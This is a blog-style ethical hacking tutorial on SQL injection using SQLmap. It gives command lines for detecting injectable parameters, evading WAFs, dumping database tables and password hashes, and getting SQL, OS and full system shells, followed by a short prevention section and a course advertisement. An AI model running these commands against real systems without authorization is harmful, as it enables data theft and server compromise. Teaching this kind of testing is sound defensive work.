Ethical Hacking
d3ndr1t0x  

SQL Injection and SQLmap: A Technical Guide

SQL Injection (SQLi) is a technique used to manipulate a web application’s database by injecting malicious SQL queries through input fields. Attackers can exploit SQLi vulnerabilities to extract data, modify database contents, escalate privileges, or even gain remote system access. This guide provides an in-depth look at SQLmap, an automated tool for detecting and exploiting SQL injection vulnerabilities.

Installing SQLmap

SQLmap can be installed via GitHub or a package manager.

Clone from GitHub:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py -h  # Verify installation

Install via package manager:

sudo apt install sqlmap  # Debian-based systems
yum install sqlmap  # RHEL-based systems

Identifying SQL Injection Vulnerabilities

SQLmap can automatically test for vulnerabilities in web applications.

Basic SQL injection detection:

sqlmap -u "http://example.com/page.php?id=1" --batch --dbs
  • -u specifies the target URL.
  • --batch automates responses.
  • --dbs attempts to enumerate databases if the target is vulnerable.

Checking for different injection techniques:

sqlmap -u "http://example.com/page.php?id=1" --technique=U,B,T,E,S --dbs
  • --technique=U,B,T,E,S tests for different SQLi techniques (Union, Boolean-based, Time-based, Error-based, Stacked queries).

Bypassing WAFs and filtering mechanisms:

sqlmap -u "http://example.com/page.php?id=1" --random-agent --tamper=space2comment
  • --random-agent uses a random User-Agent header.
  • --tamper=space2comment attempts to evade WAFs by replacing spaces with comments.

Extracting Database Information

Once SQLi is confirmed, SQLmap can be used to extract critical data.

List all databases:

sqlmap -u "http://example.com/page.php?id=1" --dbs

List tables from a specific database:

sqlmap -u "http://example.com/page.php?id=1" -D users_db --tables

Dump table contents:

sqlmap -u "http://example.com/page.php?id=1" -D users_db -T admin --dump

Extract hashed passwords:

sqlmap -u "http://example.com/page.php?id=1" --passwords --batch

Retrieve specific columns from a table:

sqlmap -u "http://example.com/page.php?id=1" -D users_db -T admin -C username,password --dump
  • -C specifies columns to extract (e.g., username and password).

Privilege Escalation and Shell Access

SQLmap can attempt privilege escalation and command execution.

Check if the current user has DBA privileges:

sqlmap -u "http://example.com/page.php?id=1" --is-dba

Attempt privilege escalation:

sqlmap -u "http://example.com/page.php?id=1" --privileges

Extract user roles and privileges:

sqlmap -u "http://example.com/page.php?id=1" --users --roles --batch

Open an interactive SQL shell:

sqlmap -u "http://example.com/page.php?id=1" --sql-shell

Obtain an OS shell (if command execution is possible):

sqlmap -u "http://example.com/page.php?id=1" --os-shell

Gain a full system shell (if elevated privileges exist):

sqlmap -u "http://example.com/page.php?id=1" --os-pwn

Automating SQL Injection Attacks

SQLmap can automate SQL injection by scanning entire websites.

Scan all GET and POST parameters:

sqlmap -u "http://example.com/page.php" --forms --crawl=2 --batch
  • --forms detects injectable form fields.
  • --crawl=2 sets crawl depth to discover more pages.

Test for second-order SQL injection:

sqlmap -u "http://example.com/page.php?id=1" --second-url="http://example.com/confirm.php"
  • --second-url specifies a secondary endpoint to check for delayed injection effects.

Perform a time-based blind SQL injection attack:

sqlmap -u "http://example.com/page.php?id=1" --technique=T --time-sec=5
  • --technique=T forces a time-based attack.
  • --time-sec=5 introduces a 5-second delay to verify execution.

Preventing SQL Injection

To secure applications against SQLi attacks:

Use Parameterized Queries (Python Example):

cursor.execute("SELECT * FROM users WHERE username = ? AND password = ?", (user, pass))

Input Validation and Sanitization:

import re
if not re.match("^[a-zA-Z0-9]*$", user_input):
    raise ValueError("Invalid input detected")

Implement Web Application Firewalls (WAFs):

  • Use ModSecurity with OWASP CRS.
  • Employ database-specific security configurations.

Restrict Database User Privileges:

  • Avoid using root/admin accounts for web applications.
  • Grant only necessary privileges to database users.

SQL injection remains one of the most severe security threats, but SQLmap is an essential tool for penetration testers and security professionals looking to identify and mitigate vulnerabilities. However, mastering tools like SQLmap—and ethical hacking in general—requires a solid understanding of Linux. Most pentesting tools, including SQLmap, are designed to run on Linux-based operating systems like Kali Linux.

If you want to get hands-on with tools like SQLmap, you’ll need to know your way around Kali. That’s exactly what Kali 101 is for. It’s a crash course designed to take you from beginner to confident Linux user, covering everything you need to start hacking like a pro. Check it out below!

Start learning Linux

Find this helpful? Share it with others!

d3ndr1t0x

Leave A Comment